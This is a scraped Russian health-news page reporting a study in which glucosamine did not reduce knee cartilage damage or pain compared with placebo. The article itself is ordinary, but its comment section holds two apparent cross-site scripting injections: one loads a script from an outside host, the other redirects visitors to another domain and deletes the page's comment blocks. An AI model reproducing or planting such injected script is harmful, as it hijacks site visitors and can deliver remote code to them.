Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Популярный БАД не помогае...  >>  Популярный БАД не помогает вашим коленям
 
Обратная связь
 

Популярный БАД не помогает вашим коленям

Размер шрифта
30 сентября 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Далеко не всегда широко разрекламированные лекарства и БАДы так эффективны, как о них говорят. К примеру, если верить недавнему исследованию, популярная пищевая добавка глюкозамин вовсе не предотвращает повреждение хрящевой ткани у людей с хроническими болями в колене.

Популярный БАД не помогает вашим коленям

Миллионы людей по всему миру принимают глюкозамин с целью лечения остеоартроза суставов, чаще всего – коленного. Самая распространенная форма артроза, а именно остеоартроз, связана с естественным износом суставов.

В исследовании, опубликованном в марте в журнале Arthritis & Rheumatology, приняли участие около 200 человек, страдающих от болей в одном или обоих коленных суставах. Уровень боли был различен: от небольшой до очень сильной. Участников эксперимента случайным образом поделили на две группы: пациенты из первой группы принимали по 1500 миллиграмм глюкозамина в день в течение 24 недель, пациенты из второй получали плацебо.

Для определения степени повреждения хрящевой ткани коленных суставов была использована магнитно-резонансная томография. Согласно полученным данным, в группе глюкозамина не наблюдалось снижения уровня повреждения хряща по сравнению с группой плацебо. К тому же, применение глюкозамина не приводило к уменьшению болевых ощущений.

«Нами не было получено данных, подтверждающих, что употребление глюкозамина снижает повреждение хрящевой ткани суставов, уменьшает боль или улучшает состояние пациентов с хроническими болями в колене», – заявляет доктор Кент Кво, глава Центра изучения артрита университета Аризоны. По данным опросов около 10% взрослого населения Соединенных Штатов принимают глюкозамин.

Не стоит безоговорочно верить в пользу очередного БАДа, возможно, он не принесет вам никакой пользы. Не упускайте возможности проконсультироваться со специалистом, который будет в курсе всех новостей современной медицинской науки.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:32

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:28

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Оказывается, виагра помогает не только мужчинам, но и женщинам! В чем же?   Сходите в суши ресторан! Имбирь защищает от рака   Похоже, брокколи скоро заменит все! Оказывается и против боли в суставах она помогает!   БАДы оказались самыми загрязненными препаратами  
01 ноября 2013ИНВИТРО – «Марка №1» в России 21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт»
 
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 03 октября 2013Результаты благотворительного марафона «Всем миром»
 

Слайдшоу

1
Странные сигналы вашего организма
Как снова хотеть секса
Проблемы с внешностью или болезнь?

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.